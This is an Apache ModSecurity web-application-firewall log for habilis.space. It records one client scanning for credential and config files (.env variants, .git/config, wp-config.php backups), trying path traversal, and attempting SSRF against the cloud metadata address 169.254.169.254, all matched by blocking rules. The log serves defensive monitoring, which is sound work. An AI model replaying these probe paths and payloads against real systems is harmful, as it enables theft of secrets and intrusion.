[Mon May 11 19:11:46.896286 2026] [security2:error] [pid 1511173:tid 1511190] [client 45.148.10.249:10966] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0vjVc-A-CSptvm1OHAAAAE4"]
[Mon May 11 19:11:46.897247 2026] [security2:error] [pid 1502013:tid 1502045] [client 45.148.10.249:10974] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/wp-config.php~"] [unique_id "agIN0pYn-x0CHsbEbP2GowAAAJI"]
[Mon May 11 19:11:46.897367 2026] [security2:error] [pid 1502013:tid 1502045] [client 45.148.10.249:10974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/wp-config.php~"] [unique_id "agIN0pYn-x0CHsbEbP2GowAAAJI"]
[Mon May 11 19:11:46.897583 2026] [security2:error] [pid 1502013:tid 1502045] [client 45.148.10.249:10974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0pYn-x0CHsbEbP2GowAAAJI"]
[Mon May 11 19:11:46.899397 2026] [security2:error] [pid 1502013:tid 1502040] [client 45.148.10.249:10858] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agIN0pYn-x0CHsbEbP2GpAAAAI0"]
[Mon May 11 19:11:46.899458 2026] [security2:error] [pid 1502013:tid 1502040] [client 45.148.10.249:10858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agIN0pYn-x0CHsbEbP2GpAAAAI0"]
[Mon May 11 19:11:46.899471 2026] [security2:error] [pid 1501883:tid 1501907] [client 45.148.10.249:10904] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.gitignore"] [unique_id "agIN0jP5Q_-MBliRCAxCZgAAABY"]
[Mon May 11 19:11:46.899586 2026] [security2:error] [pid 1501883:tid 1501907] [client 45.148.10.249:10904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.gitignore"] [unique_id "agIN0jP5Q_-MBliRCAxCZgAAABY"]
[Mon May 11 19:11:46.899689 2026] [security2:error] [pid 1511173:tid 1511191] [client 45.148.10.249:10806] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/sites/default/settings.php"] [unique_id "agIN0vjVc-A-CSptvm1OHQAAAE8"]
[Mon May 11 19:11:46.899703 2026] [security2:error] [pid 1502013:tid 1502040] [client 45.148.10.249:10858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agIN0pYn-x0CHsbEbP2GpAAAAI0"]
[Mon May 11 19:11:46.899794 2026] [security2:error] [pid 1501883:tid 1501907] [client 45.148.10.249:10904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0jP5Q_-MBliRCAxCZgAAABY"]
[Mon May 11 19:11:46.899804 2026] [security2:error] [pid 1511173:tid 1511191] [client 45.148.10.249:10806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/sites/default/settings.php"] [unique_id "agIN0vjVc-A-CSptvm1OHQAAAE8"]
[Mon May 11 19:11:46.899994 2026] [security2:error] [pid 1511173:tid 1511191] [client 45.148.10.249:10806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0vjVc-A-CSptvm1OHQAAAE8"]
[Mon May 11 19:11:46.900193 2026] [security2:error] [pid 1502013:tid 1502040] [client 45.148.10.249:10858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0pYn-x0CHsbEbP2GpAAAAI0"]
[Mon May 11 19:11:46.903304 2026] [core:error] [pid 1424905:tid 1424925] [client 45.148.10.249:10926] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 19:11:46.905866 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.save"] [unique_id "agIN0lNddpkriGUb6ZVRgQAAARc"]
[Mon May 11 19:11:46.906014 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.save"] [unique_id "agIN0lNddpkriGUb6ZVRgQAAARc"]
[Mon May 11 19:11:46.906214 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0lNddpkriGUb6ZVRgQAAARc"]
[Mon May 11 19:11:46.906808 2026] [security2:error] [pid 1501883:tid 1501893] [client 45.148.10.249:10846] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/backend/.env"] [unique_id "agIN0jP5Q_-MBliRCAxCZwAAAAg"]
[Mon May 11 19:11:46.906932 2026] [security2:error] [pid 1501883:tid 1501893] [client 45.148.10.249:10846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/backend/.env"] [unique_id "agIN0jP5Q_-MBliRCAxCZwAAAAg"]
[Mon May 11 19:11:46.907112 2026] [security2:error] [pid 1501883:tid 1501893] [client 45.148.10.249:10846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0jP5Q_-MBliRCAxCZwAAAAg"]
[Mon May 11 19:11:46.907638 2026] [security2:error] [pid 1424905:tid 1424930] [client 45.148.10.249:10834] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/logs/HEAD"] [unique_id "agIN0oW8yzYoWG_eyCXPdgAAAVY"]
[Mon May 11 19:11:46.907785 2026] [security2:error] [pid 1424905:tid 1424930] [client 45.148.10.249:10834] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/logs/HEAD"] [unique_id "agIN0oW8yzYoWG_eyCXPdgAAAVY"]
[Mon May 11 19:11:46.907975 2026] [security2:error] [pid 1424905:tid 1424930] [client 45.148.10.249:10834] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0oW8yzYoWG_eyCXPdgAAAVY"]
[Mon May 11 19:11:46.910036 2026] [security2:error] [pid 1511173:tid 1511188] [client 45.148.10.249:10810] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.local"] [unique_id "agIN0vjVc-A-CSptvm1OHwAAAEw"]
[Mon May 11 19:11:46.910174 2026] [security2:error] [pid 1511173:tid 1511188] [client 45.148.10.249:10810] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.local"] [unique_id "agIN0vjVc-A-CSptvm1OHwAAAEw"]
[Mon May 11 19:11:46.910369 2026] [security2:error] [pid 1511173:tid 1511188] [client 45.148.10.249:10810] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0vjVc-A-CSptvm1OHwAAAEw"]
[Mon May 11 19:11:46.911595 2026] [security2:error] [pid 1501831:tid 1501841] [client 45.148.10.249:10912] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agIN0lNddpkriGUb6ZVRggAAAQg"]
[Mon May 11 19:11:46.912610 2026] [security2:error] [pid 1501831:tid 1501841] [client 45.148.10.249:10912] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agIN0lNddpkriGUb6ZVRggAAAQg"]
[Mon May 11 19:11:46.912695 2026] [security2:error] [pid 1502013:tid 1502066] [client 45.148.10.249:10920] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/local/.env"] [unique_id "agIN0pYn-x0CHsbEbP2GpgAAAIM"]
[Mon May 11 19:11:46.912829 2026] [security2:error] [pid 1502013:tid 1502066] [client 45.148.10.249:10920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/local/.env"] [unique_id "agIN0pYn-x0CHsbEbP2GpgAAAIM"]
[Mon May 11 19:11:46.913023 2026] [security2:error] [pid 1502013:tid 1502066] [client 45.148.10.249:10920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0pYn-x0CHsbEbP2GpgAAAIM"]
[Mon May 11 19:11:46.913028 2026] [security2:error] [pid 1501831:tid 1501841] [client 45.148.10.249:10912] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0lNddpkriGUb6ZVRggAAAQg"]
[Mon May 11 19:11:46.913149 2026] [security2:error] [pid 1501883:tid 1501888] [client 45.148.10.249:10808] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.production"] [unique_id "agIN0jP5Q_-MBliRCAxCaAAAAAM"]
[Mon May 11 19:11:46.913283 2026] [security2:error] [pid 1501883:tid 1501888] [client 45.148.10.249:10808] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.production"] [unique_id "agIN0jP5Q_-MBliRCAxCaAAAAAM"]
[Mon May 11 19:11:46.913458 2026] [security2:error] [pid 1501883:tid 1501888] [client 45.148.10.249:10808] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0jP5Q_-MBliRCAxCaAAAAAM"]
[Mon May 11 19:11:46.913817 2026] [security2:error] [pid 1501831:tid 1501836] [client 45.148.10.249:10896] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.development"] [unique_id "agIN0lNddpkriGUb6ZVRgwAAAQM"]
[Mon May 11 19:11:46.913930 2026] [security2:error] [pid 1501831:tid 1501836] [client 45.148.10.249:10896] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.development"] [unique_id "agIN0lNddpkriGUb6ZVRgwAAAQM"]
[Mon May 11 19:11:46.914113 2026] [security2:error] [pid 1501831:tid 1501836] [client 45.148.10.249:10896] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0lNddpkriGUb6ZVRgwAAAQM"]
[Mon May 11 19:11:46.923783 2026] [security2:error] [pid 1501883:tid 1501893] [client 45.148.10.249:10846] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "habilis.space"] [uri "/_next/image"] [unique_id "agIN0jP5Q_-MBliRCAxCawAAAAg"]
